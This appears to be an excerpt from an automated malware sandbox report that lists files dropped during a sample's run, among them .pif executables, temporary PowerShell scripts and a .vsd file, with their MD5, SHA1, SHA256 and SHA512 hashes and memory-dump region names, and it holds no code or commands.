SHA512 c0a2772c8ae6c4b450f38327c8386f526ffff7f3bec3bf6e495a2a01b465da64de4d815e51961f37cb43239b05d3fd53a01fb4b33cd0fa67a84680bc24ffe572

C:\Users\Admin\AppData\Local\Temp\Evaluation

MD5 9c1eec6ad97d3430478939c6df01ea8a
SHA1 be6e6c3fbb3fb22e34d7b5bc2c1a2d996bb4e81e
SHA256 fbc43c30a07c44894f7870d666d3e370f4d5f77695d5fa727597884c1495fc9b
SHA512 2f4923eccd70a2790b6a6e4876f91aa9fd87b7e767abac3e48084b14de21a7beccf471eca35b9df1069e67ed18407916213ff7b52b129fe252c7169b2081bad6

C:\Users\Admin\AppData\Local\Temp\Synthetic

MD5 c0391116646bfea7d85bb681a33e3ba0
SHA1 9996422133ed60d69b923b118949183e8758e0a3
SHA256 5791d23d4c78f0e17d98eee9e51ebf24ea678fdf9b059bfb5dcf19c16dcba85a
SHA512 3e6a4e31ad6161fa617aa116378d9817390a031e640a157cdda299e8d0dddc4e27517ff53ed56081c0c34b348be627b6a5ab6f1c1ae9192f34a446ba19b23f47

C:\Users\Admin\AppData\Local\Temp\208231\War.pif

MD5 78ba0653a340bac5ff152b21a83626cc
SHA1 b12da9cb5d024555405040e65ad89d16ae749502
SHA256 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
SHA512 efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

C:\Users\Admin\AppData\Local\Temp\208231\O

MD5 36464052c5bab6fbe9375ae0c39f051a
SHA1 cd35ee319164eb8a73bc8b5f86fea33b7227ae64
SHA256 d0b9c83c8bddbe2d9e18b0e8c5e3abcdb3bac5a9f6f3058fc3bcb8d3fde78ced
SHA512 01a7c98f1fa174dfc72360372b01e641a432e5b429ac3a366a9648f42e1776e9cfd5f9834173a8483fc470b1ec7fcadde7a7f639e07f08dadf460f5b46e9cb59

memory/4172-553-0x0000000000470000-0x00000000004C7000-memory.dmp

memory/4172-555-0x0000000000470000-0x00000000004C7000-memory.dmp

memory/4172-554-0x0000000000470000-0x00000000004C7000-memory.dmp

memory/4172-558-0x0000000000470000-0x00000000004C7000-memory.dmp

memory/4172-557-0x0000000000470000-0x00000000004C7000-memory.dmp

memory/4172-556-0x0000000000470000-0x00000000004C7000-memory.dmp

memory/3948-564-0x0000000004910000-0x0000000004946000-memory.dmp

memory/4172-567-0x00000000069F0000-0x0000000006A29000-memory.dmp

memory/4172-566-0x00000000069F0000-0x0000000006A29000-memory.dmp

memory/4172-565-0x0000000000470000-0x00000000004C7000-memory.dmp

memory/3948-572-0x0000000004FD0000-0x00000000055F8000-memory.dmp

memory/3948-573-0x0000000005660000-0x0000000005682000-memory.dmp

memory/3948-574-0x0000000005780000-0x00000000057E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfruxvds.332.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3948-575-0x00000000058A0000-0x0000000005906000-memory.dmp

memory/3948-585-0x0000000005A80000-0x0000000005DD4000-memory.dmp

memory/3948-586-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

memory/3948-587-0x0000000005F20000-0x0000000005F6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\K1HDCVMZ3CHA6WL98LCQ54O6LSAEU.ps1

MD5 a93ef812fcdf3af24ff8b33a75d4992e
SHA1 b282892bd321a8709474f43d790d7e661edaa98f
SHA256 d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6
SHA512 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037

memory/3948-589-0x0000000007510000-0x0000000007B8A000-memory.dmp

memory/3948-590-0x0000000006420000-0x000000000643A000-memory.dmp

memory/1160-600-0x0000000007A20000-0x0000000007AB6000-memory.dmp

memory/1160-601-0x0000000007980000-0x00000000079A2000-memory.dmp

memory/1160-602-0x0000000008070000-0x0000000008614000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f48374bf42e705689df188bd0e8fa105
SHA1 4e46ca4b09158875153f7188acd11f335a891d4f
SHA256 994544725ccd58a4c4becbddce321d366371e9f1b9d5ddd5c2c4f7b28d0c88af
SHA512 cd87435b528190c27d8010fb0f2b9e797d7f3b0a5a67ad8de8c78c3972d0af002d78fcd75125a379bccbc57889f5903790e97b92ebe1e603c751b4ac4bd46f3b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 def65711d78669d7f8e69313be4acf2e
SHA1 6522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256 aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA512 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

C:\Users\Admin\AppData\Roaming\0VYTBW.pif

MD5 3f58a517f1f4796225137e7659ad2adb
SHA1 e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA256 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512 acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

C:\Users\Admin\AppData\Roaming\KHOIE0.vsd

MD5 3c6d0866e54ab391bc09713fde4c9d38
SHA1 a1a4e9c067e3c85739e85fb45f7ecdb363bcf856
SHA256 ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682
SHA512 eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4